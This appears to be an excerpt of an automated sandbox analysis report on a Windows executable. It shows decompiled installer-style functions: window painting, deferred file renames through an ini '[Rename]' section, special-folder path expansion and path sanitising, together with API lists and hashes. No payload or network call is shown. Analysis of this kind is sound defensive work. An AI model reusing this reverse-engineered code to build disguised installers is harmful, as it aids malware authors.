                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                    • String ID: Fdskdfkdsfsdfdsf$N$open
                                                                                    • API String ID: 3615053054-3313475987
                                                                                    • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                                                    • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
                                                                                    • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                                                    • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 90%
                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                    				struct tagLOGBRUSH _v16;
                                                                                    				struct tagRECT _v32;
                                                                                    				struct tagPAINTSTRUCT _v96;
                                                                                    				struct HDC__* _t70;
                                                                                    				struct HBRUSH__* _t87;
                                                                                    				struct HFONT__* _t94;
                                                                                    				long _t102;
                                                                                    				signed int _t126;
                                                                                    				struct HDC__* _t128;
                                                                                    				intOrPtr _t130;
                                                                                    
                                                                                    				if(_a8 == 0xf) {                                    /* 0xf = WM_PAINT: draw the vertical gradient and the caption */
                                                                                    					_t130 =  *0x42ec30;
                                                                                    					_t70 = BeginPaint(_a4,  &_v96);
                                                                                    					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                    					_a8 = _t70;
                                                                                    					GetClientRect(_a4,  &_v32);
                                                                                    					_t126 = _v32.bottom;
                                                                                    					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                    					while(_v32.top < _t126) {
                                                                                    						_a12 = _t126 - _v32.top;
                                                                                    						asm("cdq");
                                                                                    						asm("cdq");
                                                                                    						asm("cdq");
                                                                                    						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                    						_t87 = CreateBrushIndirect( &_v16);
                                                                                    						_v32.bottom = _v32.bottom + 4;
                                                                                    						_a16 = _t87;
                                                                                    						FillRect(_a8,  &_v32, _t87);
                                                                                    						DeleteObject(_a16);
                                                                                    						_v32.top = _v32.top + 4;
                                                                                    					}
                                                                                    					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                    						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                    						_a16 = _t94;
                                                                                    						if(_t94 != 0) {
                                                                                    							_t128 = _a8;
                                                                                    							_v32.left = 0x10;
                                                                                    							_v32.top = 8;
                                                                                    							SetBkMode(_t128, 1);
                                                                                    							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                    							_a8 = SelectObject(_t128, _a16);
                                                                                    							DrawTextA(_t128, 0x42e420, 0xffffffff,  &_v32, 0x820);
                                                                                    							SelectObject(_t128, _a8);
                                                                                    							DeleteObject(_a16);
                                                                                    						}
                                                                                    					}
                                                                                    					EndPaint(_a4,  &_v96);
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t102 = _a16;
                                                                                    				if(_a8 == 0x46) {
                                                                                    					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                    					 *((intOrPtr*)(_t102 + 4)) =  *0x42ec28;
                                                                                    				}
                                                                                    				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                    			}


                                                                                    APIs
                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                    • FillRect.USER32 ref: 004010E4
                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                    • DrawTextA.USER32(00000000,0042E420,000000FF,00000010,00000820), ref: 00401156
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                    • String ID: F
                                                                                    • API String ID: 941294808-1304234792
                                                                                    • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                                                    • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
                                                                                    • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                                                    • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 93%
                                                                                    			E00405915(void* __eflags) {
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr* _t15;
                                                                                    				long _t16;
                                                                                    				int _t20;
                                                                                    				void* _t28;
                                                                                    				long _t29;
                                                                                    				intOrPtr* _t37;
                                                                                    				int _t43;
                                                                                    				void* _t44;
                                                                                    				long _t47;
                                                                                    				CHAR* _t49;
                                                                                    				void* _t51;
                                                                                    				void* _t53;
                                                                                    				intOrPtr* _t54;
                                                                                    				void* _t55;
                                                                                    				void* _t56;
                                                                                    
                                                                                    				_t15 = E00405F57(2);
                                                                                    				_t49 =  *(_t55 + 0x18);
                                                                                    				if(_t15 != 0) {
                                                                                    					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                                                    					if(_t20 != 0) {
                                                                                    						L16:
                                                                                    						 *0x42ecb0 =  *0x42ecb0 + 1;
                                                                                    						return _t20;
                                                                                    					}
                                                                                    				}
                                                                                    				 *0x42c230 = 0x4c554e;
                                                                                    				if(_t49 == 0) {
                                                                                    					L5:
                                                                                    					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
                                                                                    					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                    						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
                                                                                    						_t56 = _t55 + 0x10;
                                                                                    						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)( *0x42ec30 + 0x128)));
                                                                                    						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
                                                                                    						_t53 = _t20;
                                                                                    						 *(_t56 + 0x14) = _t53;
                                                                                    						if(_t53 == 0xffffffff) {
                                                                                    							goto L16;
                                                                                    						}
                                                                                    						_t47 = GetFileSize(_t53, 0);
                                                                                    						_t7 = _t43 + 0xa; // 0xa
                                                                                    						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                                                    						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                                                    							L15:
                                                                                    							_t20 = CloseHandle(_t53);
                                                                                    							goto L16;
                                                                                    						} else {
                                                                                    							if(E00405813(_t51, "[Rename]\r\n") != 0) {
                                                                                    								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
                                                                                    								if(_t28 == 0) {
                                                                                    									L13:
                                                                                    									_t29 = _t47;
                                                                                    									L14:
                                                                                    									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
                                                                                    									SetFilePointer(_t53, 0, 0, 0);
                                                                                    									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                                                    									GlobalFree(_t51);
                                                                                    									goto L15;
                                                                                    								}
                                                                                    								_t37 = _t28 + 1;
                                                                                    								_t44 = _t51 + _t47;
                                                                                    								_t54 = _t37;
                                                                                    								if(_t37 >= _t44) {
                                                                                    									L21:
                                                                                    									_t53 =  *(_t56 + 0x14);
                                                                                    									_t29 = _t37 - _t51;
                                                                                    									goto L14;
                                                                                    								} else {
                                                                                    									goto L20;
                                                                                    								}
                                                                                    								do {
                                                                                    									L20:
                                                                                    									 *((char*)(_t43 + _t54)) =  *_t54;
                                                                                    									_t54 = _t54 + 1;
                                                                                    								} while (_t54 < _t44);
                                                                                    								goto L21;
                                                                                    							}
                                                                                    							E00405BC7(_t51 + _t47, "[Rename]\r\n");
                                                                                    							_t47 = _t47 + 0xa;
                                                                                    							goto L13;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					CloseHandle(E0040589E(_t49, 0, 1));
                                                                                    					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
                                                                                    					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                    						goto L5;
                                                                                    					}
                                                                                    				}
                                                                                    				return _t16;
                                                                                    			}


                                                                                    APIs
                                                                                      • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                      • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
                                                                                    • GetShortPathNameA.KERNEL32 ref: 0040596B
                                                                                    • GetShortPathNameA.KERNEL32 ref: 00405988
                                                                                    • wsprintfA.USER32 ref: 004059A6
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
                                                                                    • GlobalFree.KERNEL32 ref: 00405A65
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C
                                                                                      • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                      • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                    • String ID: %s=%s$[Rename]
                                                                                    • API String ID: 3445103937-1727408572
                                                                                    • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                    • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
                                                                                    • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                    • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 74%
                                                                                    			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                    				signed int _v8;
                                                                                    				struct _ITEMIDLIST* _v12;
                                                                                    				signed int _v16;
                                                                                    				signed char _v20;
                                                                                    				signed int _v24;
                                                                                    				signed char _v28;
                                                                                    				signed int _t36;
                                                                                    				CHAR* _t37;
                                                                                    				signed int _t39;
                                                                                    				int _t40;
                                                                                    				char _t50;
                                                                                    				char _t51;
                                                                                    				char _t53;
                                                                                    				char _t55;
                                                                                    				void* _t63;
                                                                                    				signed int _t69;
                                                                                    				signed int _t74;
                                                                                    				signed int _t75;
                                                                                    				char _t83;
                                                                                    				void* _t85;
                                                                                    				CHAR* _t86;
                                                                                    				void* _t88;
                                                                                    				signed int _t95;
                                                                                    				signed int _t97;
                                                                                    				void* _t98;
                                                                                    
                                                                                    				_t88 = __esi;
                                                                                    				_t85 = __edi;
                                                                                    				_t63 = __ebx;
                                                                                    				_t36 = _a8;
                                                                                    				if(_t36 < 0) {
                                                                                    					_t36 =  *( *0x42e3fc - 4 + _t36 * 4);
                                                                                    				}
                                                                                    				_t74 =  *0x42ec58 + _t36;
                                                                                    				_t37 = 0x42dbc0;
                                                                                    				_push(_t63);
                                                                                    				_push(_t88);
                                                                                    				_push(_t85);
                                                                                    				_t86 = 0x42dbc0;
                                                                                    				if(_a4 - 0x42dbc0 < 0x800) {
                                                                                    					_t86 = _a4;
                                                                                    					_a4 = _a4 & 0x00000000;
                                                                                    				}
                                                                                    				while(1) {
                                                                                    					_t83 =  *_t74;
                                                                                    					if(_t83 == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					__eflags = _t86 - _t37 - 0x400;
                                                                                    					if(_t86 - _t37 >= 0x400) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_t74 = _t74 + 1;
                                                                                    					__eflags = _t83 - 0xfc;
                                                                                    					_a8 = _t74;
                                                                                    					if(__eflags <= 0) {
                                                                                    						if(__eflags != 0) {
                                                                                    							 *_t86 = _t83;
                                                                                    							_t86 =  &(_t86[1]);
                                                                                    							__eflags = _t86;
                                                                                    						} else {
                                                                                    							 *_t86 =  *_t74;
                                                                                    							_t86 =  &(_t86[1]);
                                                                                    							_t74 = _t74 + 1;
                                                                                    						}
                                                                                    						continue;
                                                                                    					}
                                                                                    					_t39 =  *(_t74 + 1);
                                                                                    					_t75 =  *_t74;
                                                                                    					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
                                                                                    					_a8 = _a8 + 2;
                                                                                    					_v28 = _t75 | 0x00000080;
                                                                                    					_t69 = _t75;
                                                                                    					_v24 = _t69;
                                                                                    					__eflags = _t83 - 0xfe;
                                                                                    					_v20 = _t39 | 0x00000080;
                                                                                    					_v16 = _t39;
                                                                                    					if(_t83 != 0xfe) {
                                                                                    						__eflags = _t83 - 0xfd;
                                                                                    						if(_t83 != 0xfd) {
                                                                                    							__eflags = _t83 - 0xff;
                                                                                    							if(_t83 == 0xff) {
                                                                                    								__eflags = (_t39 | 0xffffffff) - _t95;
                                                                                    								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
                                                                                    							}
                                                                                    							L41:
                                                                                    							_t40 = lstrlenA(_t86);
                                                                                    							_t74 = _a8;
                                                                                    							_t86 =  &(_t86[_t40]);
                                                                                    							_t37 = 0x42dbc0;
                                                                                    							continue;
                                                                                    						}
                                                                                    						__eflags = _t95 - 0x1d;
                                                                                    						if(_t95 != 0x1d) {
                                                                                    							__eflags = (_t95 << 0xa) + 0x42f000;
                                                                                    							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
                                                                                    						} else {
                                                                                    							E00405B25(_t86,  *0x42ec28);
                                                                                    						}
                                                                                    						__eflags = _t95 + 0xffffffeb - 7;
                                                                                    						if(_t95 + 0xffffffeb < 7) {
                                                                                    							L32:
                                                                                    							E00405E29(_t86);
                                                                                    						}
                                                                                    						goto L41;
                                                                                    					}
                                                                                    					_t97 = 2;
                                                                                    					_t50 = GetVersion();
                                                                                    					__eflags = _t50;
                                                                                    					if(_t50 >= 0) {
                                                                                    						L12:
                                                                                    						_v8 = 1;
                                                                                    						L13:
                                                                                    						__eflags =  *0x42eca4;
                                                                                    						if( *0x42eca4 != 0) {
                                                                                    							_t97 = 4;
                                                                                    						}
                                                                                    						__eflags = _t69;
                                                                                    						if(_t69 >= 0) {
                                                                                    							__eflags = _t69 - 0x25;
                                                                                    							if(_t69 != 0x25) {
                                                                                    								__eflags = _t69 - 0x24;
                                                                                    								if(_t69 == 0x24) {
                                                                                    									GetWindowsDirectoryA(_t86, 0x400);
                                                                                    									_t97 = 0;
                                                                                    								}
                                                                                    								while(1) {
                                                                                    									__eflags = _t97;
                                                                                    									if(_t97 == 0) {
                                                                                    										goto L29;
                                                                                    									}
                                                                                    									_t51 =  *0x42ec24;
                                                                                    									_t97 = _t97 - 1;
                                                                                    									__eflags = _t51;
                                                                                    									if(_t51 == 0) {
                                                                                    										L25:
                                                                                    										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
                                                                                    										__eflags = _t53;
                                                                                    										if(_t53 != 0) {
                                                                                    											L27:
                                                                                    											 *_t86 =  *_t86 & 0x00000000;
                                                                                    											__eflags =  *_t86;
                                                                                    											continue;
                                                                                    										}
                                                                                    										__imp__SHGetPathFromIDListA(_v12, _t86);
                                                                                    										__imp__CoTaskMemFree(_v12);
                                                                                    										__eflags = _t53;
                                                                                    										if(_t53 != 0) {
                                                                                    											goto L29;
                                                                                    										}
                                                                                    										goto L27;
                                                                                    									}
                                                                                    									__eflags = _v8;
                                                                                    									if(_v8 == 0) {
                                                                                    										goto L25;
                                                                                    									}
                                                                                    									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
                                                                                    									__eflags = _t55;
                                                                                    									if(_t55 == 0) {
                                                                                    										goto L29;
                                                                                    									}
                                                                                    									goto L25;
                                                                                    								}
                                                                                    								goto L29;
                                                                                    							}
                                                                                    							GetSystemDirectoryA(_t86, 0x400);
                                                                                    							goto L29;
                                                                                    						} else {
                                                                                    							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
                                                                                    							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
                                                                                    							__eflags =  *_t86;
                                                                                    							if( *_t86 != 0) {
                                                                                    								L30:
                                                                                    								__eflags = _v16 - 0x1a;
                                                                                    								if(_v16 == 0x1a) {
                                                                                    									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                    								}
                                                                                    								goto L32;
                                                                                    							}
                                                                                    							E00405BE9(_t72, _t86, _t97, _t86, _v16);
                                                                                    							L29:
                                                                                    							__eflags =  *_t86;
                                                                                    							if( *_t86 == 0) {
                                                                                    								goto L32;
                                                                                    							}
                                                                                    							goto L30;
                                                                                    						}
                                                                                    					}
                                                                                    					__eflags = _t50 - 0x5a04;
                                                                                    					if(_t50 == 0x5a04) {
                                                                                    						goto L12;
                                                                                    					}
                                                                                    					__eflags = _v16 - 0x23;
                                                                                    					if(_v16 == 0x23) {
                                                                                    						goto L12;
                                                                                    					}
                                                                                    					__eflags = _v16 - 0x2e;
                                                                                    					if(_v16 == 0x2e) {
                                                                                    						goto L12;
                                                                                    					} else {
                                                                                    						_v8 = _v8 & 0x00000000;
                                                                                    						goto L13;
                                                                                    					}
                                                                                    				}
                                                                                    				 *_t86 =  *_t86 & 0x00000000;
                                                                                    				if(_a4 == 0) {
                                                                                    					return _t37;
                                                                                    				}
                                                                                    				return E00405BC7(_a4, _t37);
                                                                                    			}
                                                                                    0x00405cba
                                                                                    0x00405cc1
                                                                                    0x00405cc5
                                                                                    0x00405cc5
                                                                                    0x00405cc6
                                                                                    0x00405cc8
                                                                                    0x00405d01
                                                                                    0x00405d04
                                                                                    0x00405d14
                                                                                    0x00405d17
                                                                                    0x00405d1f
                                                                                    0x00405d25
                                                                                    0x00405d25
                                                                                    0x00405d81
                                                                                    0x00405d81
                                                                                    0x00405d83
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405d29
                                                                                    0x00405d30
                                                                                    0x00405d31
                                                                                    0x00405d33
                                                                                    0x00405d4d
                                                                                    0x00405d5b
                                                                                    0x00405d61
                                                                                    0x00405d63
                                                                                    0x00405d7e
                                                                                    0x00405d7e
                                                                                    0x00405d7e
                                                                                    0x00000000
                                                                                    0x00405d7e
                                                                                    0x00405d69
                                                                                    0x00405d74
                                                                                    0x00405d7a
                                                                                    0x00405d7c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405d7c
                                                                                    0x00405d35
                                                                                    0x00405d38
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405d47
                                                                                    0x00405d49
                                                                                    0x00405d4b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405d4b
                                                                                    0x00000000
                                                                                    0x00405d81
                                                                                    0x00405d0c
                                                                                    0x00000000
                                                                                    0x00405cca
                                                                                    0x00405ccf
                                                                                    0x00405ce5
                                                                                    0x00405cea
                                                                                    0x00405ced
                                                                                    0x00405d8a
                                                                                    0x00405d8a
                                                                                    0x00405d8e
                                                                                    0x00405d96
                                                                                    0x00405d96
                                                                                    0x00000000
                                                                                    0x00405d8e
                                                                                    0x00405cf7
                                                                                    0x00405d85
                                                                                    0x00405d85
                                                                                    0x00405d88
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405d88
                                                                                    0x00405cc8
                                                                                    0x00405c9b
                                                                                    0x00405c9f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405ca1
                                                                                    0x00405ca5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405ca7
                                                                                    0x00405cab
                                                                                    0x00000000
                                                                                    0x00405cad
                                                                                    0x00405cad
                                                                                    0x00000000
                                                                                    0x00405cad
                                                                                    0x00405cab
                                                                                    0x00405e10
                                                                                    0x00405e1a
                                                                                    0x00405e26
                                                                                    0x00405e26
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(?,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00405D0C
                                                                                    • GetWindowsDirectoryA.KERNEL32(Fdskdfkdsfsdfdsf,00000400), ref: 00405D1F
                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,0041AF03), ref: 00405D5B
                                                                                    • SHGetPathFromIDListA.SHELL32(0041AF03,Fdskdfkdsfsdfdsf), ref: 00405D69
                                                                                    • CoTaskMemFree.OLE32(0041AF03), ref: 00405D74
                                                                                    • lstrcatA.KERNEL32(Fdskdfkdsfsdfdsf,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
                                                                                    • lstrlenA.KERNEL32(Fdskdfkdsfsdfdsf,?,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                    • String ID: Fdskdfkdsfsdfdsf$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                    • API String ID: 900638850-3531331202
                                                                                    • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                    • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
                                                                                    • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                    • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405E29(CHAR* _a4) {
                                                                                    				char _t5;
                                                                                    				char _t7;
                                                                                    				char* _t15;
                                                                                    				char* _t16;
                                                                                    				CHAR* _t17;
                                                                                    
                                                                                    				_t17 = _a4;
                                                                                    				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                    					_t17 =  &(_t17[4]);
                                                                                    				}
                                                                                    				if( *_t17 != 0 && E00405727(_t17) != 0) {
                                                                                    					_t17 =  &(_t17[2]);
                                                                                    				}
                                                                                    				_t5 =  *_t17;
                                                                                    				_t15 = _t17;
                                                                                    				_t16 = _t17;
                                                                                    				if(_t5 != 0) {
                                                                                    					do {
                                                                                    						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
                                                                                    							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                    							_t16 = CharNextA(_t16);
                                                                                    						}
                                                                                    						_t17 = CharNextA(_t17);
                                                                                    						_t5 =  *_t17;
                                                                                    					} while (_t5 != 0);
                                                                                    				}
                                                                                    				 *_t16 =  *_t16 & 0x00000000;
                                                                                    				while(1) {
                                                                                    					_t16 = CharPrevA(_t15, _t16);
                                                                                    					_t7 =  *_t16;
                                                                                    					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                    						break;
                                                                                    					}
                                                                                    					 *_t16 =  *_t16 & 0x00000000;
                                                                                    					if(_t15 < _t16) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					break;
                                                                                    				}
                                                                                    				return _t7;
                                                                                    			}

                                                                                    APIs
                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                    • CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                    • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: "C:\Users\user\Desktop\Nz7NA3F7z7.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
